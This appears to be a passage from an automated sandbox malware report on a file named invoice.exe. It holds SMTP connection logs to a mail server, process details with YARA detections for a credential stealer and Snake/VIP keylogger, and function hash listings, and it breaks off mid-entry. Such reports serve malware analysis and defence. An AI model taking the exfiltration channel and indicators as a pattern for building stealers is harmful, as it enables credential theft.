Oct 1, 2024 06:19:30.706386089 CEST	587	50478	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:30 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:30.706701040 CEST	50478	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:30.869846106 CEST	587	50478	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:30.870125055 CEST	50478	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:31.067959070 CEST	587	50478	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:33.778631926 CEST	587	50479	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:33 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:33.778901100 CEST	50479	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:33.943249941 CEST	587	50479	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:33.943403959 CEST	50479	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:34.110279083 CEST	587	50479	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:36.516168118 CEST	587	50480	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:36 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:36.520237923 CEST	50480	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:36.689112902 CEST	587	50480	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:36.691881895 CEST	50480	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:36.861313105 CEST	587	50480	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:39.322885990 CEST	587	50481	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:39 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:39.323049068 CEST	50481	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:39.483606100 CEST	587	50481	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:39.483767033 CEST	50481	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:39.643310070 CEST	587	50481	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:40.796188116 CEST	587	50482	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:40 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:40.799951077 CEST	50482	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:40.965611935 CEST	587	50482	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:40.968162060 CEST	50482	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:41.136759043 CEST	587	50482	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:42.318197012 CEST	587	50483	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:42 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:42.320733070 CEST	50483	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:42.484992981 CEST	587	50483	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:42.488168001 CEST	50483	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:42.848891973 CEST	587	50483	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:45.318393946 CEST	587	50484	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:45 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:45.318650007 CEST	50484	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:45.938385963 CEST	587	50485	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:45 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:45.940186977 CEST	50485	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:46.102451086 CEST	587	50485	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:46.102581978 CEST	50485	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:46.820144892 CEST	587	50486	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:46 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:46.820280075 CEST	50486	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:46.993697882 CEST	587	50486	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:46.993890047 CEST	50486	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:47.163491964 CEST	587	50486	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:49.624175072 CEST	587	50487	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:49 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:49.624327898 CEST	50487	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:49.804085016 CEST	587	50487	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:49.804233074 CEST	50487	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:49.979368925 CEST	587	50487	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:52.583496094 CEST	587	50488	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:52 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:52.583668947 CEST	50488	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:52.749480009 CEST	587	50488	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:52.751990080 CEST	50488	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:52.920582056 CEST	587	50488	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:55.656263113 CEST	587	50489	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:55 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:55.656512976 CEST	50489	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:55.826982021 CEST	587	50489	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:55.827230930 CEST	50489	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:55.990618944 CEST	587	50489	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:58.432950020 CEST	587	50490	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:58 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:58.435995102 CEST	50490	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:58.594486952 CEST	587	50490	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:58.594708920 CEST	50490	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:58.762013912 CEST	587	50490	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:20:01.244245052 CEST	587	50491	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:20:01 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:20:01.244400978 CEST	50491	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:20:01.407757998 CEST	587	50491	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:20:01.408027887 CEST	50491	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:20:02.172878027 CEST	587	50492	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:20:02 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:20:02.173316956 CEST	50492	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:20:02.343900919 CEST	587	50492	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:20:02.344153881 CEST	50492	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:20:02.510256052 CEST	587	50492	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:20:05.285984039 CEST	587	50493	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:20:05 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:20:05.849674940 CEST	50493	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:20:06.452809095 CEST	587	50494	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:20:06 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:20:06.457964897 CEST	50494	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:20:06.618541002 CEST	587	50494	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:20:06.621649027 CEST	50494	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:20:06.789107084 CEST	587	50494	198.54.114.247	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	00:15:57
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\invoice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\invoice.exe"
Imagebase:	0xdf0000
File size:	796'168 bytes
MD5 hash:	69F5EC778E467C7D87F15B201C893816
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:15:59
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\invoice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\invoice.exe"
Imagebase:	0xf10000
File size:	796'168 bytes
MD5 hash:	69F5EC778E467C7D87F15B201C893816
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	161
Total number of Limit Nodes:	12

Executed Functions

Function 057DDB60 Relevance: 2.7, Strings: 2, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 057DDD70
Te^q, xrefs: 057DDBD9

Memory Dump Source

Source File: 00000000.00000002.1713422518.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_invoice.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: ddeba92c81d67553e44e8b043a16a626d95eb48dd25c222f2f53871b037796bd
Instruction ID: 924a9160e32c555fb9b7ab9590d55ccaca55aced11a74e5ed0bc4e458cb5a2f2
Opcode Fuzzy Hash: ddeba92c81d67553e44e8b043a16a626d95eb48dd25c222f2f53871b037796bd
Instruction Fuzzy Hash: 3381B174E012198FDB18CFAAC984AEEFBF2BF88300F24852AD415AB354DB355945DF64

Function 057DDB70 Relevance: 2.7, Strings: 2, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 057DDD70
Te^q, xrefs: 057DDBD9

Memory Dump Source

Source File: 00000000.00000002.1713422518.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_invoice.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 6bb08a27bbc3045c84606936feddac80dc724eba89d45752898427218a5a6a66
Instruction ID: c99f5c6e7571c99961aab695aa1ade7f8057faef4d2506579debb39cc1edced3
Opcode Fuzzy Hash: 6bb08a27bbc3045c84606936feddac80dc724eba89d45752898427218a5a6a66
Instruction Fuzzy Hash: AA819074E002198FDB18CFEAC984AEEFBB2BF88300F14952AD415AB364DB355945DF64

Function 07EF0006 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b75c0489e5050383f4e0e39af9ff65c40d30aba1301b457faedb3dad98832c4c
Instruction ID: 35627f6732e153da71ba8bbe7b79674e15d27a5573d057e871e7473aff7dc69b
Opcode Fuzzy Hash: b75c0489e5050383f4e0e39af9ff65c40d30aba1301b457faedb3dad98832c4c
Instruction Fuzzy Hash: 88D12AB4D1620ACFCB44CFA5C4818AEFBB2FF8A300F54955AD515AB316E7349A46CF90

Function 07EF0040 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d28e526122c1ab60637cdb5a49b5f84b47064d15416a6bae2e75a6c32c8560e
Instruction ID: d1b811f933bfdf3f10e1df28a7b85c3f94183bc5cab903f6b6c2ff5eb892131e
Opcode Fuzzy Hash: 2d28e526122c1ab60637cdb5a49b5f84b47064d15416a6bae2e75a6c32c8560e
Instruction Fuzzy Hash: 54D107B4D1220ADFCB44CFA9C4818AEFBB2FF89300F54A559D515AB315D734AA42CF94

Function 07EF3F68 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c70dfd1ac5da1509788c98d4cff35e8d7e43ad444e32b4d52f8114141775bb79
Instruction ID: a7d25202c66b30fe733651d03062f125af176809494e7be6989d35985a9797ff
Opcode Fuzzy Hash: c70dfd1ac5da1509788c98d4cff35e8d7e43ad444e32b4d52f8114141775bb79
Instruction Fuzzy Hash: 8BB1F6B1D1521ADFDF18CFA6D8809DEFBB2BF89210F10E56AD515AB254DB349942CF00

Function 07EF3F59 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70b1befdf6425610b51f62535720b9851d73e221a608a48b91239736126f5cf2
Instruction ID: 119e4bd3179737688c983af1bc28bbf1dfd8caa5a992748a4cf2e2c2b96625a6
Opcode Fuzzy Hash: 70b1befdf6425610b51f62535720b9851d73e221a608a48b91239736126f5cf2
Instruction Fuzzy Hash: EAB105B1E1521ADFDF18CFA6D9809DEFBB2BF89200F10E56AD515A7264DB309942CF00

Function 07EF3720 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62efb9be5be935707a240fe48ff00ba1601d6b25f3fa813fb42bd9155c2d1b66
Instruction ID: 1018ef92f74e3ffdb34c7b44f31087fec33f72f2cdc91dc51c7ac3d9755acfbc
Opcode Fuzzy Hash: 62efb9be5be935707a240fe48ff00ba1601d6b25f3fa813fb42bd9155c2d1b66
Instruction Fuzzy Hash: 9371D5B4D15209DFCB04CFEAD5809DEFBB2FB89310F20942AE515AB664DB349A42CF41

Function 07EF3713 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f69d9538b5b7f5e1817838731ff2a0bf9c6e42e9548cc90953b949537d90701
Instruction ID: eee4d7326e1ae0f14e2d6fdd8e76d380883b42e2296f023db680775570b67781
Opcode Fuzzy Hash: 8f69d9538b5b7f5e1817838731ff2a0bf9c6e42e9548cc90953b949537d90701
Instruction Fuzzy Hash: 2671F6B4D15209DFCB04CFAAD4809DEFBB2FF89310F24942AE515AB664DB349A42CF40

Function 07EF27E8 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fdf776616eee1cf5cc6afacb80d8cdb9346291a335a72f43780ed43027ed593
Instruction ID: 10dd2a4093d2c5cd520eb7924d4e4af41a8db7712f4f707d1a194c60ee8cc43e
Opcode Fuzzy Hash: 1fdf776616eee1cf5cc6afacb80d8cdb9346291a335a72f43780ed43027ed593
Instruction Fuzzy Hash: AB5124B4E252099FCB08CFA9D8458AEFBB6FB89310F00D42AE915E7254DB349A01CF55

Function 07EF27E3 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c29e71290793ef034154d025019e4cc9edfea99a0260ec06c650b6743f92bd9f
Instruction ID: 42fe55f1ba2df2dc359a7242fd5d3964cb077e37452f86ee7b2c57646d837604
Opcode Fuzzy Hash: c29e71290793ef034154d025019e4cc9edfea99a0260ec06c650b6743f92bd9f
Instruction Fuzzy Hash: F45125B4E212099FCB08CFA9D9459AEFBB6FB89310F00D42AE915E7354DB349A01CF55

Function 07EFEAA3 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d21b49a6f9a3eeaa725d270461bbf6ddb1a7b43e26eb50ba6ff14be14700f5b
Instruction ID: 9ca3e004d3a80805bf8158a06f9e504e9a74f25f7af6d1849c19ad650f5a3bc1
Opcode Fuzzy Hash: 9d21b49a6f9a3eeaa725d270461bbf6ddb1a7b43e26eb50ba6ff14be14700f5b
Instruction Fuzzy Hash: 3A314DB4D1A248CFDB14CFAAD5452EDFBF5BF8E300F10A12AE50AA6665DB342945CF00

Function 057DED40 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713422518.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7fabaf1388321a83f97af5f701eebcbb3d633b2a4e02dce8358f878e8ba26a
Instruction ID: 5b992c8f6a4520d1c50cfa184ba5c67af074aeac5cae28a4b2424f905cfa95d6
Opcode Fuzzy Hash: 4e7fabaf1388321a83f97af5f701eebcbb3d633b2a4e02dce8358f878e8ba26a
Instruction Fuzzy Hash: 4321C3B1E006188BEB18CFAAD9447DEFBF7AFC8310F14C16AD409A6254DB745A498F90

Function 057DED30 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713422518.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c33d61ce94eb2ab6c88317df4c266e3c7989fccfb00777f4dd637cc5fcac9630
Instruction ID: 253d4c159cb7ff92b13d1d648d797917df4a1d1f0b6e10497697d6147a7e123f
Opcode Fuzzy Hash: c33d61ce94eb2ab6c88317df4c266e3c7989fccfb00777f4dd637cc5fcac9630
Instruction Fuzzy Hash: 2E21C7B1E006188BEB18CF9BC94578EFBF2AF88310F14C16AD409AA354DB7459498F50

Function 0DCB0658 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720301114.000000000DCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dcb0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a940c4346f9c9161a04fa0b8459aa77a5723304ea7f2481184d02013ddf532ab
Instruction ID: fbb779df26483e88f07474765c6c08a8406e27b5bfac987f6c6ddeff6dcf68a7
Opcode Fuzzy Hash: a940c4346f9c9161a04fa0b8459aa77a5723304ea7f2481184d02013ddf532ab
Instruction Fuzzy Hash: C8F0E274C0E249DFCB029BA8A8452F6BBB8BF4B225F0824E6E54D97162C730C465DF12

Function 016FD868 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 016FD8F6
GetCurrentThread.KERNEL32 ref: 016FD933
GetCurrentProcess.KERNEL32 ref: 016FD970
GetCurrentThreadId.KERNEL32 ref: 016FD9C9

Memory Dump Source

Source File: 00000000.00000002.1710592193.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_invoice.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: bf85f830baaa730443692cced9d4ef60e396fff31fa417bc10a93e66eab93bb9
Instruction ID: ae5ee3fef660f7bfa851f8070545fb174bd044d13721358738cc6eeabce13a9a
Opcode Fuzzy Hash: bf85f830baaa730443692cced9d4ef60e396fff31fa417bc10a93e66eab93bb9
Instruction Fuzzy Hash: B65144B09002098FDB04DFA9DA48BDEBBF1FF49304F248459D159A7360DB35A988CF65

Function 016FD878 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 016FD8F6
GetCurrentThread.KERNEL32 ref: 016FD933
GetCurrentProcess.KERNEL32 ref: 016FD970
GetCurrentThreadId.KERNEL32 ref: 016FD9C9

Memory Dump Source

Source File: 00000000.00000002.1710592193.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_invoice.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b8deb919423315424cb6cecd5d1a16a971ff5f9534464b720424b5fc2df0cb8f
Instruction ID: 30995c6b7680f3359ea9e6712500e9a5c91666ecc0ca36cade49a806bbd072e6
